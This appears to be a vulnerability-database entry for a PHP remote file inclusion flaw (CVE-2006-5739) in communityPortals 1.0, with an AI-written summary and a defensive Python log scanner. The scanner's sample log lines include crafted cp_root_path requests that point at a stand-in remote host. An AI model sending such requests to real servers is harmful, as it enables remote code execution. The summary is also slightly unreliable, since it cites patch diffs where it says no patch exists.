CVE-2006-5739
Description
PHP remote file inclusion in Leicestershire communityPortals 1.0 allows arbitrary code execution via the cp_root_path parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A PHP remote file inclusion vulnerability exists in cpadmin/cpa_index.php within Leicestershire communityPortals version 1.0_2005-10-18_12-31-18. This vulnerability is triggered when a specially crafted URL is provided in the cp_root_path parameter, allowing remote attackers to include arbitrary files [1].
Exploitation
An attacker can exploit this vulnerability by sending a request to the vulnerable cpadmin/cpa_index.php script with a URL pointing to a remote file in the cp_root_path parameter. This requires the server to be configured to allow remote file inclusions and for the attacker to know the path to the vulnerable script [1].
Impact
Successful exploitation allows a remote attacker to execute arbitrary PHP code on the server. This can lead to a full compromise of the affected server, depending on the privileges of the web server process.
Mitigation
A patch for this vulnerability is unavailable according to the provided reference [1]. Users are advised to upgrade to a version where this vulnerability is fixed, if such a version exists, or to implement other security measures to prevent remote file inclusions.
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:leicestershire:communityportals:1.0:*:*:*:*:*:*:*
- (no CPE) range: = 1.0_2005-10-18_12-31-18
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The application does not properly sanitize user-supplied input in the cp_root_path parameter, allowing for remote file inclusion."
Attack vector
An attacker can send a crafted GET request to `cpadmin/cpa_index.php` with a URL in the `cp_root_path` parameter. This URL points to a remote file on an attacker-controlled server. The application then includes and executes the content of this remote file, leading to arbitrary code execution. This is a different vector than CVE-2006-5280 [1].
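A defender-side check for the request pattern described above, as an added example that is not part of the CVE record or of communityPortals itself: it scans web access log lines for requests to `cpadmin/cpa_index.php` whose `cp_root_path` value starts with a URL scheme. The combined log format, the function names and the sample lines (documentation IP ranges, `example.test` host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPT = "cpadmin/cpa_index.php"  # script named in the CVE description
PARAM = "cp_root_path"            # parameter named in the CVE description

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Value begins with a URL scheme (two or more characters, so Windows drive
# letters such as "C:" are not flagged) or with a protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.IGNORECASE)


def remote_include_value(line):
    """Return the decoded cp_root_path value if it is scheme-prefixed, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not unquote(parts.path).lower().endswith("/" + SCRIPT):
        return None
    # parse_qs percent-decodes each value once, as the web server would.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (client_address, cp_root_path value) for every flagged line."""
    return [(line.split()[0], v) for line in lines
            if (v := remote_include_value(line))]


# Constructed sample log lines; none come from a real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jun/2026:10:00:00 +0000] "GET /portal/cpadmin/cpa_index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Jun/2026:10:01:12 +0000] "GET /portal/cpadmin/cpa_index.php?cp_root_path=http://files.example.test/a.txt HTTP/1.1" 200 312',
    '203.0.113.5 - - [02/Jun/2026:10:02:40 +0000] "GET /portal/cpadmin/cpa_index.php?cp_root_path=http%3A%2F%2Ffiles.example.test%2Fa.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [02/Jun/2026:10:03:05 +0000] "GET /portal/cpadmin/cpa_index.php?cp_root_path=/var/www/portal/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} requested {SCRIPT} with {PARAM}={value}")
```

A request carrying the parameter in a POST body does not appear in access logs, so this check covers only the GET vector the record describes.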
Affected code
The vulnerability exists in the `cpadmin/cpa_index.php` file, specifically in how it handles the `cp_root_path` parameter. The exploit targets the `includes/import-archive.php` script, which is included by `cpadmin/cpa_index.php` [1].
What the fix does
The patch is unavailable. The advisory recommends that users upgrade to a patched version once it becomes available. Until then, users should be cautious of this vulnerability [1].
Preconditions
- network: The vulnerable application must be accessible over the network.
- input: The attacker must be able to control the value of the `cp_root_path` parameter.
Reproduction
The provided exploit script demonstrates how to trigger the vulnerability by specifying a remote URL for the `cp_root_path` parameter [1].
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (2)
News mentions
No linked articles in our index yet.